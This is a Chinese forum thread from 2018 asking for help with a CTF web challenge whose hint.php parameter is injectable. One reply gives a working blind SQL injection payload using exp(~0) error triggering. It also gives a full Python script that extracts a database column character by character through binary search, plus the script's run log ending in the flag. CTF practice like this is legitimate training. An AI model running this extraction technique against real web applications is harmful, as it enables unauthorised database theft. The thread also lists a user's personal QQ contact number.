求教一份web题目

显示全部楼层 · 2018-12-4 01:30:50

http://124.16.75.162:40006
看到有：http://124.16.75.162:40006/hint.php?id=1

猜测是注入，没有看到回显，测试延时注入发现sleep等也被过滤了，也试了get_lock 不知道为什么不可以，有没有师傅会的呢。。。

leixiao · 2018-12-5 07:16:59

求告知这是哪里的题？

leixiao · 2018-12-5 07:43:26

只会提示sql语句语法正不正确，所以同时利用报错函数和布尔盲注
payload：

http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,1))%3E1,1,exp(~0))--+

贴上我的脚本

#-*- coding: utf-8 -*-
import requests
import re
requests=requests.session()
strall=[]
strall.append('0')
for i in range(33,128):
strall.append(str(i))
def isthis(index,charascii,compare):
headers={
'Host': '124.16.75.162:40006',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
url="http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,{}))".format(str(34-index))+compare+"{},1,exp(~0))--+".format(charascii)
print url
r=requests.get(url=url,headers=headers)
a=True
if r.text.find('sql')>=0:
print 'false'
a=False
else:
print 'true'
a=True
return a
ans=''
flag=0
for index in range(1,99):
left=0
right=len(strall)
if flag:
break
while left<=right:
mid=(left+right)>>1
if isthis(index,strall[mid],">"):
left=mid+1
elif isthis(index,strall[mid],"<"):
right=mid-1
else:
if strall[mid]=='0':
flag=1
break
value=chr(int(strall[mid]))
ans+=value
print ans
break
print ans
raw_input('done')

复制代码

发不了截图，就copy一下脚本最后的运行情况，，，

http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<43,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>37,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<37,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>34,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<34,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>0,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<0,1,exp(~0))--+
false
flag{read_more_to_get_admin_pass}
done

Echocipher · 2018-12-13 11:20:11

leixiao 发表于 2018-12-5 07:43
只会提示sql语句语法正不正确，所以同时利用报错函数和布尔盲注
payload：

谢谢师傅！能加一下您的联系方式嘛

leixiao · 2018-12-19 20:24:46

Echocipher 发表于 2018-12-13 11:20
谢谢师傅！能加一下您的联系方式嘛

可以啊，qq 1729888211

Sniper · 2019-10-25 15:53:32

向大佬学习

[CTF问题] 求教一份web题目